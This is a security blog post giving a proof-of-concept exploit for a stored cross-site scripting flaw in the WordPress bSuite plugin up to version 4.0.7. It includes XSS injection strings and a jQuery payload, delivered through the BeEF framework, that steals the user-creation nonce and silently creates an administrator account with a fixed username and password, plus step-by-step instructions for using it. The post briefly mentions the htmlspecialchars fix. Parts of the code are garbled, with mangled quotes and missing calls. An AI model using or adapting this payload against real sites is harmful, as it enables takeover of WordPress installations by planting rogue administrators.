WordPress bSuite plugin <= 4.0.7 Permanent XSS (Add Admin)

WordPress bSuite <= 4.0.7 Permanent XSS -> Add Admin
Download link:
Author contact: 29/06/2011
POC published: 11/07/2011
Plugin is out-of-date, last update on 2009, so this is just a POC that show how to made the XSS more useful 😉

FIX: Add htmlspecialchars to output

Bug found by: IHTeam

Follow us on Twitter! @IHTeam


You can inject XSS in different way, for example:<h2>XSSED</h2>
or directly in URL:<h1>XSSED</h1>
Now, when admin enter in bSuite panel, will see the XSSED code

We will use beef to do that part. So:

  1. Run beef on you local machine
  2. Enable auto-run that code:

jQuery(“<div>”, {
id: “testbeef”
jQuery.get(“user-new.php”, function(data) {
var nonce=jQuery(“#_wpnonce_create-user”).val();
jQuery(“#testbeef”).html(“”);“user-new.php”, {
“_wp_http_referer”: “/wordpress/wp-admin/user-new.php”,
“_wpnonce_create-user”: nonce,
action: “createuser”,
createuser: “Add New User”,
email: “[email protected]”,
first_name: “”,
last_name: “”,
pass1: “123123hello”,
pass2: “123123hello”,
role: “administrator”,
url: “”,
user_login: “hax0r”


We make 2 request to /wordpress/wp-admin/user-new.php because we need to grab _wpnonce_create-user value.

  1. First create a new div with ID testbeef
  2. Request user-new.php and append content to the DIV
  3. Grab _wpnonce_create-user value to nonce variable
  4. Clean the DIV content;
  5. Make a POST request to user-new.php with the correct values

Review the code to change  _wp_http_referer, pass1, pass2 and user_login of the POST request.
Now it’s time to inject the beef control script in bSuite like this:<script src=””></script>

You may wait 1h to 5h for bSuit refresh. It will result in new admin with username: haxor and password: 123123hello

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.